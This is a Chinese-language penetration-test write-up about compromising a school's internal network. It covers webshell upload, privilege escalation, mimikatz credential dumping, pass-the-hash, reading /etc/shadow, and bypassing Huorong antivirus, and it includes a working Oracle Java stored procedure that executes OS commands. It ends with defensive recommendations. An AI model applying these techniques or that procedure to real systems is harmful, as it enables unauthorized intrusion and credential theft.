学校内网渗透测试技术文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 系统发现<\/h3>

发现学校同时运行新旧系统，老系统未下线<\/li>

通过全面搜索确认老系统存在安全漏洞<\/li> <\/ul>

1.2 漏洞发现<\/h3>

发现老系统存在任意文件上传漏洞

无任何过滤机制<\/li>

可直接上传一句话木马<\/li> <\/ul> <\/li> <\/ul>

2. 初始入侵<\/h2>

2.1 WebShell连接问题<\/h3>

蚁剑和菜刀连接返回不同路径

蚁剑连接后无法上传文件<\/li>
菜刀连接可上传文件<\/li> <\/ul> <\/li>

执行命令后IP被封禁，疑似存在WAF<\/li> <\/ul>

2.2 权限提升<\/h3>

上传MSF的aspx木马获取meterpreter会话<\/li>

使用windows-exploit-suggest检测未打补丁

发现MS16-075漏洞<\/li> <\/ul> <\/li>

使用Juicy Potato提权

需修改CLSID（参考：https:\/\/github.com\/ohpe\/juicy-potato\/tree\/master\/CLSID）<\/li>

建议使用bind_tcp正向连接payload<\/li> <\/ul> <\/li> <\/ul>

3. 横向移动<\/h2>

3.1 密码获取<\/h3>

使用MSF的mimikatz模块获取密码<\/li>

发现域环境异常（原有域消失，无法找到域控）<\/li> <\/ul>

3.2 哈希传递攻击<\/h3>

对445端口开放但3389关闭的机器<\/li>

优先使用psexec模块进行哈希传递

可获取SYSTEM权限<\/li>

适用于无法获取明文密码的情况<\/li> <\/ul> <\/li> <\/ul>

4. 新系统渗透<\/h2>

4.1 任意文件下载漏洞<\/h3>

发现root用户运行的服务存在任意文件下载<\/li>

尝试读取敏感文件：

\/etc\/shadow（爆破root密码失败）<\/li>

\/root\/.bash_history（获取操作历史记录）<\/li> <\/ul> <\/li> <\/ul>

4.2 Oracle数据库利用<\/h3>

发现多台机器使用默认SID的Oracle数据库<\/li>
爆破发现system用户密码为默认值"manager"<\/li>

Oracle数据库system用户可执行系统命令<\/li> <\/ul>

5. 绕过安全防护<\/h2>

5.1 火绒行为检测绕过<\/h3>

直接执行命令受限（如net user无回显）<\/li>
发现可通过Navicat中的sqlplus连接执行命令<\/li>

创建Java存储过程执行系统命令：<\/li> <\/ul>

create<\/span> or<\/span> replace<\/span> and<\/span> compile Java Source<\/span> named "OSCommand"<\/span> as<\/span>
<\/span><\/span>import java.io.*<\/span>;
<\/span><\/span>import java.lang.*<\/span>;
<\/span><\/span>public<\/span> class<\/span> OSCommand{<\/span>
<\/span><\/span>    public<\/span> static<\/span> String Run(String Command){<\/span>
<\/span><\/span>        Runtime rt =<\/span> Runtime.getRuntime();
<\/span><\/span>        int     rc =<\/span> -<\/span>1<\/span>;
<\/span><\/span>        try{<\/span>
<\/span><\/span>            Process p =<\/span> rt.exec<\/span>( Command );
<\/span><\/span>            int bufSize =<\/span> 32000<\/span>;
<\/span><\/span>            int len =<\/span> 0<\/span>;
<\/span><\/span>            byte buffer[] =<\/span> new<\/span> byte[bufSize];
<\/span><\/span>            String s =<\/span> null<\/span>;
<\/span><\/span>            BufferedInputStream bis =<\/span> new<\/span> BufferedInputStream( p.getInputStream(), bufSize );
<\/span><\/span>            len =<\/span> bis.read<\/span>( buffer, 0<\/span>, bufSize );
<\/span><\/span>            rc =<\/span> p.waitFor();
<\/span><\/span>            if<\/span> ( len !=<\/span> -<\/span>1<\/span> ){<\/span>
<\/span><\/span>                s =<\/span> new<\/span> String( buffer, 0<\/span>, len );
<\/span><\/span>                return<\/span>( s );
<\/span><\/span>            }<\/span>
<\/span><\/span>            return<\/span>( rc+<\/span>""<\/span> );
<\/span><\/span>        }<\/span>
<\/span><\/span>        catch (Exception<\/span> e){<\/span>
<\/span><\/span>            e.printStackTrace();
<\/span><\/span>            return<\/span>( "-1\ncommand["<\/span> +<\/span> Command +<\/span> "]\n"<\/span> +<\/span> e.getMessage" );
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>    }
<\/span><\/span><\/span>}
<\/span><\/span><\/span>\/
<\/span><\/span><\/span><\/code><\/pre>5.2 权限提升技巧<\/h3>

直接开启3389端口未被拦截<\/li>
激活guest用户并加入管理员组未被拦截

无法添加新用户但可提升现有用户权限<\/li>
<\/ul>
<\/li>
通过已知用户密码将其加入管理员组<\/li>
<\/ul>
5.3 最终权限获取<\/h3>

直接关闭火绒防护获取完整shell<\/li>
使用在线NTLM破解服务：https:\/\/www.objectif-securite.ch\/ophcrack<\/li>
发现服务器保存的Xftp密码

使用星号密码查看器工具获取保存的密码<\/li>
<\/ul>
<\/li>
<\/ul>
6. 总结与建议<\/h2>
6.1 发现的安全问题<\/h3>

老旧系统未下线且存在已知漏洞<\/li>
系统补丁更新不及时（MS16-075）<\/li>
Oracle数据库使用默认配置和弱密码<\/li>
密码重用现象严重<\/li>
敏感信息（如Xftp密码）明文保存<\/li>
<\/ol>
6.2 防御建议<\/h3>

及时下线不再使用的老旧系统<\/li>
定期更新系统补丁<\/li>
修改数据库默认配置和密码<\/li>
实施最小权限原则<\/li>
对敏感信息进行加密存储<\/li>
加强安全监控和异常行为检测<\/li>
<\/ol>
6.3 渗透测试技巧总结<\/h3>

全面信息收集是关键<\/li>
新旧系统都要检查<\/li>
横向移动时优先使用哈希传递<\/li>
遇到防护时尝试多种绕过方法<\/li>
注意利用系统历史记录和配置文件中的信息<\/li>
在线破解服务可作为辅助工具<\/li>
<\/ol>